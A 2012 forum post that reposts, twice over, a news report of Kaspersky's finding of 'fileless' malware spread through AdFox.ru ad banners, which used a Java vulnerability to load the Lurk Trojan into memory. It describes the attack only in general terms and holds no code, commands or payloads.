Terpe
28th March 2012, 08:09
Malware authors have come up with a new breed of "fileless" malware that threatens to thwart traditional antivirus software, a computer security firm said.
Kaspersky Labs said it first encountered such malware on a Russian news site that injected malware into a victim computer's memory instead of to the hard drive.
"Because no file is written to the hard drive, it becomes much harder to detect the problem using antivirus software. If the exploit is not detected, the bot can be successfully loaded into RAM, becoming virtually invisible," it said in a blog post.
"This attack targeted Russian users. However, we cannot rule out that the same exploit and the same fileless bot will be used against people in other parts of the world: they can be distributed via similar banner or teaser networks in other countries. It is likely that other malware, not just Trojan-Spy.Win32.Lurk will be used in the process," it added.
However, Kaspersky indicated this is not the first fileless malware that operates in the infected computer's RAM - the CodeRed and Slammer worms have already done so.
It said the latest such malware was found in Russian news sites where the malware could spread via advertisement management system codes.
"We discovered that the malware is loaded via the teasers on AdFox.ru," it said.
Infection
Kaspersky said a JavaScript for one of the teasers loaded on the site included an iframe that redirected the user to a malicious site in the .EU domain containing a Java exploit.
An analysis of the exploit’s JAR file demonstrated that it exploits a Java vulnerability (CVE-2011-3544), which cybercriminals have been exploiting since November.
"After seizing all necessary privileges on the victim computer, the exploit does not install malware on the hard drive using Java. Instead, it uses its payload to inject an encrypted dll from the web directly into the memory of the javaw.exe process. The address from which the library is to be downloaded is encrypted in the iframe that was included in the JS script downloaded from AdFox.ru," it said.
Kaspersky said this kind of malware remains operational until the operating system is restarted, but in this case this is not a critical issue for the Trojan’s authors.
"One reason for this is that the ‘fileless’ malware operates as a bot: after sending a series of requests to the command server and receiving replies, the exploit uses several different methods to disable UAC (User Account Control). After this the bot can install the Lurk Trojan on the infected machine. It is worth noting that the decision as to whether to install Lurk on the system is made on the cybercriminals’ server," it said.
A second reason is that the chances of the user returning to the infected website after rebooting the system are high and would result in re-infection.
Adfox notification
Kaspersky said it notified the Adfox administration of the incident and they promptly took action, resulting in the detection and removal of the malware from the infected banner.
"In the course of the investigation it was determined that the cybercriminals had used the account of an Adfox customer to change the code of news headline banners by adding an iframe redirecting users to the malicious site," it said
Source:-
http://www.gmanetwork.com/news/story/252937/scitech/technology/new-fileless-malware-discovered
Kaspersky Labs said it first encountered such malware on a Russian news site that injected malware into a victim computer's memory instead of to the hard drive.
"Because no file is written to the hard drive, it becomes much harder to detect the problem using antivirus software. If the exploit is not detected, the bot can be successfully loaded into RAM, becoming virtually invisible," it said in a blog post.
"This attack targeted Russian users. However, we cannot rule out that the same exploit and the same fileless bot will be used against people in other parts of the world: they can be distributed via similar banner or teaser networks in other countries. It is likely that other malware, not just Trojan-Spy.Win32.Lurk will be used in the process," it added.
However, Kaspersky indicated this is not the first fileless malware that operates in the infected computer's RAM - the CodeRed and Slammer worms have already done so.
It said the latest such malware was found in Russian news sites where the malware could spread via advertisement management system codes.
"We discovered that the malware is loaded via the teasers on AdFox.ru," it said.
Infection
Kaspersky said a JavaScript for one of the teasers loaded on the site included an iframe that redirected the user to a malicious site in the .EU domain containing a Java exploit.
An analysis of the exploit’s JAR file demonstrated that it exploits a Java vulnerability (CVE-2011-3544), which cybercriminals have been exploiting since November.
"After seizing all necessary privileges on the victim computer, the exploit does not install malware on the hard drive using Java. Instead, it uses its payload to inject an encrypted dll from the web directly into the memory of the javaw.exe process. The address from which the library is to be downloaded is encrypted in the iframe that was included in the JS script downloaded from AdFox.ru," it said.
Kaspersky said this kind of malware remains operational until the operating system is restarted, but in this case this is not a critical issue for the Trojan’s authors.
"One reason for this is that the ‘fileless’ malware operates as a bot: after sending a series of requests to the command server and receiving replies, the exploit uses several different methods to disable UAC (User Account Control). After this the bot can install the Lurk Trojan on the infected machine. It is worth noting that the decision as to whether to install Lurk on the system is made on the cybercriminals’ server," it said.
A second reason is that the chances of the user returning to the infected website after rebooting the system are high and would result in re-infection.
Adfox notification
Kaspersky said it notified the Adfox administration of the incident and they promptly took action, resulting in the detection and removal of the malware from the infected banner.
"In the course of the investigation it was determined that the cybercriminals had used the account of an Adfox customer to change the code of news headline banners by adding an iframe redirecting users to the malicious site," it said
Source:-
http://www.gmanetwork.com/news/story/252937/scitech/technology/new-fileless-malware-discovered